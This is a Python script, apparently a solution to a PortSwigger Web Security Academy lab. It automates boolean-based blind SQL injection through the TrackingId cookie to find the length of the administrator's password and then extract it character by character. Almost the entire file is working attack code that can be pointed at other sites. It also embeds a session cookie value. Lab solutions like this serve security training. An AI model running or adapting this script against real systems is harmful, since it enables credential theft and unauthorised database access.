PortSwigger-BlindSqlChallengePythonCode/blindsql.py at main · soroush44d/PortSwigger-BlindSqlChallengePythonCode · GitHub

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
import requests

url1 = 'https://0a1400c7048a67fe8588802400360066.web-security-academy.net/'
session = requests.Session()
org_track_id = "gahfNcfi9J7wH9rg"
char_set = "abcdefghijklmnopqrstuvwxyz0123456789"
session2 = "R15Nw67GSmqHscP9aJ8vPv14XVZ7ACY2"
min_pass_length = 1
max_pass_length = 50

cookies = {
    'TrackingId': org_track_id,
    'session': session2
}


def stick_to_track_id(cookies, payload):
    cookies['TrackingId'] += "'" + payload + "--"
    return cookies


def welcome_state(res):
    if 'Welcome' in res.text:
        return True
    else :
        return False


def find_password_length(username,cookies, track_id):
    print('Starting to find password length')
    for password in range(min_pass_length, max_pass_length):
        query = f"and (select username from users where username='{username}' and LENGTH(password)>{password})='{username}'"
        print(f"\r\x1b[K: {query}", end="")
        cookies = stick_to_track_id(cookies, query)
        session.cookies.update(cookies)
        response = session.get(url1)
        if welcome_state(response):
            cookies['TrackingId'] = track_id
        else:
            print(f"\nPassword Length:{password}")
            return password


def find_user_password(username, cookies, track_id):
    password_length = find_password_length(username, cookies, track_id)
    print(password_length)
    final_password = ""
    for char_number in range(1,password_length+1):
        for carachter in char_set:
            query = f"and (select substring(password,{char_number},1) from users where username='{username}')='{carachter}'"
            print(f"\r\x1b[KRequested Query = {query}", end="")
            cookies = stick_to_track_id(cookies, query)
            session.cookies.update(cookies)
            response = session.get(url1)
            if not welcome_state(response):
                cookies['TrackingId'] = track_id
            else:
                final_password += carachter
                print(f"Password Founded: {final_password}")
                cookies['TrackingId'] = track_id
                if len(final_password) == password_length :
                    return final_password

find_user_password('administrator', cookies, org_track_id)